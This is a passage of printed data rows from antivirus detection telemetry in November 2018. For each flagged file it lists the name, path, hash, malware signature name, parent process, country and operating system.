  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\WINDOWS\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T12:25:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autopatcher.exe', filepath='c:\\users\\X\\downloads\\autopatcher.exe', filesize=1664000, name='TR/Atom.9dc47e.#M1.#R1'), hash='9dc47e9394bb92eda8086b876761e892682d045d4a35f4dac96194d2efee5669', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Python27\\python.exe', parentsize=27136, timestamp='2018-11-02T04:35:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\hxqvgm4y0un\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\73936A91-DE34-11E8-B9C6-14FEB5AF6E9E\\\\\\\\GetSI.dll\\\\\\",SaveReportRunDllEntry \\\\\\"C:\\\\\\\\Users\\\\\\\\Fabio\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\73936A91-DE34-11E8-B9C6-14FEB5AF6E9E\\\\\\\\73936A92-DE34-11E8-B9C6-14FEB5AF6E9E\\\\\\"', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\rundll32.exe', parentsize=61952, timestamp='2018-11-02T00:19:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='c:\\users\\X\\clipgrab-3.6.8-cgorg\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T15:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='install.exe', filepath='C:\\Users\\X\\Desktop\\C_8_To-Disk-2\\CEHv8 Module 06 Trojans and Backdoors\\Miscellaneous Trojans\\Dhcsecretservice\\INSTALL.EXE', filesize=64000, name='TR/BackDoor.CV.3.#M1.#R1'), hash='b4bac33b6dd84064af9ea04b295ca98f419f968f8eb377b9d34c13297f109066', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\EC-Council Certified Ethical Hacker CEH v8 (Tools)\\\\\\\\EC-Council.Certified.Ethical.Hacker.CEH.v8.Tools.DVD2\\\\\\\\C_8_To-Disk-2.iso\\\\\\"', country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-02T13:51:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\Bin\\acadFeui\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='d42e7a85cb60ec06b47235e22c861e129db6dcfb0fa22170a73ff30de96c0466', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-02T07:12:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:40:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='[0]-audit casual upload.exe', filepath='D:\\AUDIT4\\[0]-Audit Casual Upload.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='faf55154b6f314050cf4568b1218ec0a0b4887455d120e84b54f601ccfe7f1bb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Vypress Chat\\VyChat.exe', parentsize=958464, timestamp='2018-11-02T01:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='c295276d613ba5bef8d92ef54311297939568d1ccbb8090577561363df774b15', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C295276D613BA5BEF8D92EF54311297939568D1CCBB8090577561363DF774B15', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='c295276d613ba5bef8d92ef54311297939568d1ccbb8090577561363df774b15', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:41:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c0232c16d0f27c920c61135b153ab65a121b2b3362d47231660943712472a96d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C0232C16D0F27C920C61135B153AB65A121B2B3362D47231660943712472A96D', filesize=2816000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='c0232c16d0f27c920c61135b153ab65a121b2b3362d47231660943712472a96d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T08:59:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297ad5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297ad5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:54:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='мананков.exe', filepath='\\\\?\\F:\\ТиМЦВС_PDF\\Мананков.exe', filesize=1920000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='fa7ee678263292b448bde6117bb33d950f7b82ada5700293ff1d1cd2c55a7596', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:37:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290e48', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290e48', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:42:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T17:30:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a3d5', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a3d5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:56:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='AT', os_name='MacOS', os_vmajor='14', os_vminor='5', parentproc=None, parentsize=None, timestamp='2018-11-04T17:28:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e19b7f540ff4e9322d4e4e5c469083e1849e78ffe8c0179101b778e1c216a9bf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T14:33:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134302-1278bf02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134302-1278BF02', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cfp.exe', filepath='C:\\Users\\X\\Desktop\\Miracle Box 2.27A Crac k by HiRSH GSM\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='dd5928d6a46fc44a1e0ad820a8c3242a181bc30bd84c972839ef3998ef8eeb85', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T03:51:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='googlechrome.a3x', filepath='G:\\MozillaFirefox\\GoogleChrome.a3x', filesize=0, name='WORM/Verecno.Gen2.#M2.#R101351'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T07:16:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T20:48:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121630-d7f6c922', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-121515-CB39DDDE\\AVSCAN-20181104-121630-D7F6C922', filesize=128000, name='TR/Crypt.Xpack.8894.#M1.#R1'), hash='f25c1daf238a29d6211ff51ea00bb12d968e281d6e06ff4599ce9e62a5574578', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:16:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-130657-5ebb0dde', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d438d77\\AVSCAN-20181101-130545-537131FB\\AVSCAN-20181101-130657-5EBB0DDE', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:07:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spittoon.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Skimmed\\spittoon.dll', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='fe338852318a1a17e233f197095e502a5bfcf013d3170ba8aba2fecec0115dd9', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:08:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corretivoretaguarda.exe', filepath='C:\\CHRautomacao\\Aplicativos\\CorretivoRetaguarda.exe', filesize=1280000, name='W32/Sality.AT.#M1.#R1'), hash='f6cd8420522ddddd622a4c20d9f26ee9fe651980cc84cd39a20daea05cb57040', metadata=Row(cmdline='-m:GeneralTel.dll -f:RunGeneralTelemetry  -cV MzR8X9qMPEanzCIx.1.1 -SendFullTelemetry -ThrottleUtc -FullSync', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-01T11:07:06Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T17:15:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8bcd4d00_840e707b.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8bcd4d00_840e707b.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131220-83bf0325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131220-83BF0325', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9870243\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Baixaki_Chocolatier_2434021303.exe', parentsize=2134912, timestamp='2018-11-02T14:30:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\USERS\\X\\APPDATA\\LOCAL\\Temp\\tmp8737939\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\IDM 6.28 Build 1 Registered (32bit   64bit Patch) [CrackingPatching].zip_3775744256.exe', parentsize=2409021, timestamp='2018-11-02T01:01:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Sample Videos\\Videos.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:10:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155854-e613f3a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155854-E613F3A6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='58c065d21a077f1b13675ae56f87196a03d387e769f973d6dc8db1df0858f1fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202248-fc3956cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73ba62d0\\AVSCAN-20181102-201543-BC0ED210\\AVSCAN-20181102-202248-FC3956CC', filesize=128000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:22:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161743-606386fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-161538-52C9C851\\AVSCAN-20181102-161743-606386FB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:17:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flash_update.exe', filepath='C:\\Users\\X\\Downloads\\flash_update.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:59:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='musnotification.exe', filepath='\\\\?\\E:\\Windows.old\\WINDOWS\\System32\\MusNotification.exe', filesize=192000, name='W32/Neshta.A.#M1.#R1'), hash='362606529be5ab27450819ad1b21dfb265dd1a95b26950544d7db1d8da207d5b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:56:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182854-dd2e35f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b05066eb\\AVSCAN-20181102-181715-87F04E33\\AVSCAN-20181102-182854-DD2E35F8', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='4a0d2146387671704c66f40169428527b6ab204105dc0ca723d30a93c824d162', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename=' 2015.exe', filepath='D:\\DOKUMENKU\\PM-LKMK\\REKAP ANGSURAN\\REKAP  2015\\ 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:27:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='digreg.exe', filepath='\\?\\K:\\الماس@\\DIGREG.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='08e6f8d08330fe8ca3609a8ba082e350b3351dbfd98cd52e389e7e98f522f6ff', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:14:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00043e0f', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00043e0f', filesize=21504000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='49dcb73d7b90e9a5fdc66a13c22a07e85376d2ce61573362eb0b34e7ac49a875', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:23:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:52:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160031-f0ade438', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160031-F0ADE438', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:03:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140517-7d794010', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-140456-79007B41\\AVSCAN-20181102-140517-7D794010', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:46Z'), dt=datetime.date(2018, 11, 2)),
